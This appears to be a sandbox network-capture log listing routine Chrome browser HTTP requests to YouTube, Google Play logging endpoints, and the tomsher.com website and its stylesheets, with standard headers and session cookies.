Source: global trafficHTTP traffic detected: GET /vi/LiEQ_JV0h4w/sddefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/26636eff/player_ias.vflset/en_US/remote.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=Ulq4W_fVF31lrJx3QbjNJ1B4W2aqzxvLJE4fe3kzt29nybxiVCdsT4QMq_gKV-110pq7d7AjWQCXpIYK2Z7i871eo9sbQlwJHv2bEttmZhXw255R8WYx56xA1oXC3bu_SoRNpVGSu4VM5mODezk3D3S9OgaQ7Bt2S3zbffXFjVkdr2w_i7EAjfpymQ
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi/hOPpxvP2E28/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGGUgWyhIMA8=&rs=AOn4CLB1pwsAn0qkJuzQscocunfjgcf4QA HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi/QJ96N5lUn0c/sddefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi_webp/Jo_coLYPcOQ/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=Ulq4W_fVF31lrJx3QbjNJ1B4W2aqzxvLJE4fe3kzt29nybxiVCdsT4QMq_gKV-110pq7d7AjWQCXpIYK2Z7i871eo9sbQlwJHv2bEttmZhXw255R8WYx56xA1oXC3bu_SoRNpVGSu4VM5mODezk3D3S9OgaQ7Bt2S3zbffXFjVkdr2w_i7EAjfpymQ
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=Ulq4W_fVF31lrJx3QbjNJ1B4W2aqzxvLJE4fe3kzt29nybxiVCdsT4QMq_gKV-110pq7d7AjWQCXpIYK2Z7i871eo9sbQlwJHv2bEttmZhXw255R8WYx56xA1oXC3bu_SoRNpVGSu4VM5mODezk3D3S9OgaQ7Bt2S3zbffXFjVkdr2w_i7EAjfpymQ
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=Ulq4W_fVF31lrJx3QbjNJ1B4W2aqzxvLJE4fe3kzt29nybxiVCdsT4QMq_gKV-110pq7d7AjWQCXpIYK2Z7i871eo9sbQlwJHv2bEttmZhXw255R8WYx56xA1oXC3bu_SoRNpVGSu4VM5mODezk3D3S9OgaQ7Bt2S3zbffXFjVkdr2w_i7EAjfpymQ
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=Ulq4W_fVF31lrJx3QbjNJ1B4W2aqzxvLJE4fe3kzt29nybxiVCdsT4QMq_gKV-110pq7d7AjWQCXpIYK2Z7i871eo9sbQlwJHv2bEttmZhXw255R8WYx56xA1oXC3bu_SoRNpVGSu4VM5mODezk3D3S9OgaQ7Bt2S3zbffXFjVkdr2w_i7EAjfpymQ
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.4.2/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /assets/css/bootstrap.min.css HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/css/swiper-bundle.min.css HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
